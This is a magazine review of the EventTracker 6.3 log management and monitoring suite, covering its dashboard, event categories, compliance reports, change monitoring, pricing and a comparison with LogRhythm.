Prism Microsystems EventTracker 6.3

EventTracker delivers essential log management and analysis but does combining it with systems monitoring, change management and USB access controls complicate things?

For syslog monitoring we told our switches and security devices to use the EventTracker system as their log destination and we could see from the dashboard that it was receiving this data. We could also see events coming in about logins to monitored systems, hard disks with minimal free space, registry changes, software installs and removals and so on.

We would recommend a reasonably speedy system for EventTracker as it can be quite tedious waiting for it to fill the dashboard with all events for the selected category. The dashboard itself can't be filtered but you do get a slick log search facility, which offers basic and advanced options.

There are plenty of predefined event categories provided but you can create custom ones and decide on the event severity, event and log type plus the ID and search strings. These settings make EventTracker quite versatile as you can create a category to cover almost any type of alert and device. You have, for example, preconfigured categories for Cisco PIX devicesm, where you can watch out for a range of events such as authentication failures, intrusion detection and changes of privileges.

The Reports console provides an absolute heap of predefined reports, which includes well over 200 for PCI-DSS auditing alone. There's SOX and HIPPA too but if that's not enough you also get a wizard to help create custom on-demand and scheduled reports. There's more, as the WhatChanged module keeps you posted on changes to monitored systems such as critical system changes or files and registry keys being added, deleted or modified.

Pricing starts low with the Small Business Edition costing 3,115 and licensed to monitor ten systems. Move up to fifty monitored systems and the price jumps to 12,466 and going up to support for 100 devices pushes this to nearly 22,000.

If you're in the market for a point solution that focuses purely on log data management then take a closer look at LogRhythm, which costs less for the same number of log sources. However, that's all it does so if you want the extra system monitoring and change management tools plus USB access controls then EventTracker is a worthy candidate.

Verdict

There’s a lot going on with EventTracker and as such it presents a steep learning curve. However, once we’d made it over the hill we found it very capable of making sense of the immense amount of information that log sources are capable of generating. It is more costly that point solutions but the extra cash gets you very good reporting facilities along with system and change monitoring plus USB access controls.

EventTracker Manager: Windows 2000 and above.

EventTracker Windows Agent: Windows 2000 and above.

EventTracker Solaris Agent: Solaris 9 and 10

Featured Resources

Preparing for AI-enabled cyber attacks

MIT technology review insights

Download now

Cloud storage performance analysis

Storage performance and value of the IONOS cloud Compute Engine

Download now

The Forrester Wave: Top security analytics platforms

The 11 providers that matter most and how they stack up

Download now

Harness data to reinvent your organisation

Build a data strategy for the next wave of cloud innovation

Download now

Most Popular

RMIT to be first Australian university to implement AWS supercomputing facility
high-performance computing (HPC)

RMIT to be first Australian university to implement AWS supercomputing facility

28 Jul 2021
Samsung Galaxy S21 5G review: A rose-tinted experience
Mobile Phones

Samsung Galaxy S21 5G review: A rose-tinted experience

14 Jul 2021
Zyxel USG Flex 200 review: A timely and effective solution
Security

Zyxel USG Flex 200 review: A timely and effective solution

28 Jul 2021